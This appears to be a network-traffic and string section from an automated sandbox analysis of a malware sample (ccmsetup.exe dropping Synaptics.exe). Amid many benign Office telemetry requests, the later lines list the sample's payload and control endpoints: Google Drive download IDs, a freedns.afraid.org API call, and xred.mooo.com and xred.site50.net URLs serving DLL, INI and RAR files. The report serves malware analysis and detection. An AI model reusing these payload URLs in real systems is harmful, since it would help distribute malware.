                              Source: global traffic; HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global traffic; HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global traffic
                              HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                User-Agent: Synaptics.exe
                                Cache-Control: no-cache
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: docs.google.com
Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: ._cache_ccmsetup.exe | String found in binary or memory: http://%s/%s/.sms_aut?SITESIGNCERT
Source: ._cache_ccmsetup.exe | String found in binary or memory: http://%s/SMS_MP/.sms_aut?SMSTRC
Source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr | String found in binary or memory: http://%s/SMS_MP/.sms_aut?SMSTRC..
Source: ~$cache1.3.dr | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R
Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
Source: ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: ~$cache1.3.dr | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: Synaptics.exe, 00000003.00000003.2152405545.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/e
Source: Synaptics.exe, 00000003.00000002.3004223452.000000000DC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3017129835.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060328812.000000002633E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032972975.00000000185FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029759770.0000000015CBE000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0;
Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: ~$cache1.3.dr | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
